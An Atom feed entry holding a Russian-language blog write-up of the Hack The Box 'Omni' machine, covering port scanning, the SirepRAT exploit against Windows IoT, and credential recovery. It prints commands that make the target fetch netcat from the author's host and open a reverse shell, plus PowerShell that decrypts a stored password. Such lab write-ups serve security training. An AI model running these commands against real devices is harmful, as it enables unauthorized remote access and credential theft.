<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>GhostCorp</title><author><name>GhostCorp</name></author><id>https://teletype.in/atom/goldycorp</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/goldycorp?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@goldycorp?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=goldycorp"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/goldycorp?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-07-02T22:57:16.843Z</updated><entry><id>goldycorp:At8aIiTALUA</id><link rel="alternate" type="text/html" href="https://teletype.in/@goldycorp/At8aIiTALUA?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=goldycorp"></link><title>Пентест лёгеньких Windows IoT систем</title><published>2026-07-02T19:28:05.885Z</published><updated>2026-07-02T19:28:05.885Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/91/5e/915e76aa-d664-4c2e-9b21-fa7890c331ff.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/bd/92/bd9260c7-3769-4d0c-a9d4-bf00a77dce3f.jpeg&quot;&gt;!Я лишь популяризирую данный контент!</summary><content type="html">
  &lt;p id=&quot;QW1N&quot;&gt;!Я лишь популяризирую данный контент!&lt;/p&gt;
  &lt;p id=&quot;m9Oh&quot;&gt;В статье описанно прохождение машины Omni с HACKTHEBOX&lt;/p&gt;
  &lt;p id=&quot;5xBo&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;nsxc&quot;&gt;Recon&lt;/h2&gt;
  &lt;p id=&quot;AXZt&quot;&gt;Данная машина имеет IP адрес 10.10.10.204, который я добавляю в /etc/hosts.&lt;/p&gt;
  &lt;p id=&quot;mJXU&quot;&gt;Первым делом сканируем открытые порты. Я это делаю с помощью следующего скрипта, принимающего один аргумент - адрес сканируемого хоста:&lt;/p&gt;
  &lt;p id=&quot;1H73&quot;&gt;&lt;/p&gt;
  &lt;pre id=&quot;o9qR&quot;&gt;#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d &amp;#x27;/&amp;#x27; -f 1 | tr &amp;#x27;\n&amp;#x27; &amp;#x27;,&amp;#x27; | sed s/,$//)nmap -p$ports -A $1&lt;/pre&gt;
  &lt;figure id=&quot;plbv&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/66/c3/66c3caef-6366-40d6-bba1-074d9d41af59.jpeg&quot; width=&quot;980&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZUYG&quot;&gt;Много открытых портов, при этом на 8080 нас встречает HTTP аутентификация “Windows Device Portal”. Давайте узнаем что это:&lt;/p&gt;
  &lt;p id=&quot;LrEc&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;cT0y&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/07/11/071107cd-8748-46e7-a288-76e964dc28bf.jpeg&quot; width=&quot;972&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;IfKu&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;01Ko&quot;&gt;Таким образом, это IoT мы можем найти найт&lt;/p&gt;
  &lt;p id=&quot;4yuN&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;6jYV&quot;&gt;и соответствующий популярный эксплоит SirepRAT.&lt;/p&gt;
  &lt;h3 id=&quot;AJti&quot;&gt;Entry Point&lt;/h3&gt;
  &lt;p id=&quot;v6Rk&quot;&gt;Запускаем на локальной машине веб сервер.&lt;/p&gt;
  &lt;pre id=&quot;5mSJ&quot;&gt;sudo python3 -m http.server 80&lt;/pre&gt;
  &lt;p id=&quot;j8uY&quot;&gt;Скачаем на удаленную машину netcat, запустим листенер и выполним реверс шелл с помощью netcat.&lt;/p&gt;
  &lt;pre id=&quot;BrV1&quot;&gt;python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd &amp;quot;C:\Windows\System32\cmd.exe&amp;quot; --args &amp;quot;/c powershell IWR -Uri http://10.10.14.112/nc64.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe&amp;quot; python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd &amp;quot;C:\Windows\System32\cmd.exe&amp;quot; --args &amp;quot;/c powershell C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.112 4321&amp;quot; --v&lt;/pre&gt;
  &lt;p id=&quot;YSx4&quot;&gt;Получаем оболочку&lt;/p&gt;
  &lt;p id=&quot;9Nzu&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;FufB&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bf/60/bf601188-4d01-4bf9-b8a1-4270954d5a31.jpeg&quot; width=&quot;968&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8UU5&quot;&gt;Из программного обеспечения имеется только PowerShell. Просмотрим все файлы, включая вложенные директории, с целью найти что-нибудь интересное. И мы находим.&lt;/p&gt;
  &lt;pre id=&quot;Bttl&quot;&gt;Get-ChildItem -Path &amp;quot;C:\Program Files&amp;quot;  –Recurse -force&lt;/pre&gt;
  &lt;figure id=&quot;ieH7&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9c/86/9c8689b5-29fe-4bcf-8004-0bc35305add3.jpeg&quot; width=&quot;978&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;2yUm&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7c/59/7c5957c7-bc48-4692-923f-3cb2457b4d08.jpeg&quot; width=&quot;980&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;gJT9&quot;&gt;В данном файле находим учетные данные двух пользователей. Давайте авторизуемся на веб сервере. И в консоле кинем еще один реверс шелл.&lt;/p&gt;
  &lt;h3 id=&quot;ZIMX&quot;&gt;Users &lt;/h3&gt;
  &lt;figure id=&quot;lK9k&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/55/85/5585e6ce-9f36-4ce0-a5f2-b726762eac73.jpeg&quot; width=&quot;999&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;ggS0&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b8/e2/b8e2acc0-eec9-4c2b-bd10-ccb8a5d3ac83.jpeg&quot; width=&quot;970&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Fprv&quot;&gt;Но сразу забрать флаг не вышло.&lt;/p&gt;
  &lt;p id=&quot;smNB&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;nTaP&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/64/86/648698b0-ba13-4e4f-aeea-e338498b3638.jpeg&quot; width=&quot;984&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;B2Lp&quot;&gt;Давайте декодируем пароль&lt;/p&gt;
  &lt;p id=&quot;Mxc6&quot;&gt;&lt;/p&gt;
  &lt;pre id=&quot;T8IN&quot;&gt;$userTXT = Import-CliXml -Path C:\Data\Users\app\user.txt
$userTXT.GetNetworkCredential().Password&lt;/pre&gt;
  &lt;h3 id=&quot;QWvF&quot;&gt;Root&lt;/h3&gt;
  &lt;p id=&quot;wcd6&quot;&gt;&lt;/p&gt;
  &lt;p id=&quot;6Mgy&quot;&gt;Теперь проделаем все те же функции от имени администратора.&lt;/p&gt;
  &lt;figure id=&quot;QywX&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/70/6c/706c4f71-c27f-419a-9b9c-89cdbef68814.jpeg&quot; width=&quot;1079&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;RRSB&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a9/f7/a9f72259-1c74-40f8-a9ed-c3a6d455c6b4.jpeg&quot; width=&quot;987&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;mJQ5&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/cd/71/cd71b376-d2ca-4a36-826a-a2383d7f470b.jpeg&quot; width=&quot;987&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;rDeD&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/83/90/8390c64f-ad51-4597-89bd-7d2cd8989a82.jpeg&quot; width=&quot;994&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;6rsJ&quot;&gt;Машина пройдена!&lt;/p&gt;
  &lt;p id=&quot;bpD5&quot;&gt;Ист habr.ru&lt;/p&gt;
  &lt;p id=&quot;RbTe&quot;&gt;@rxeto @rxeto @rxeto&lt;/p&gt;

</content></entry></feed>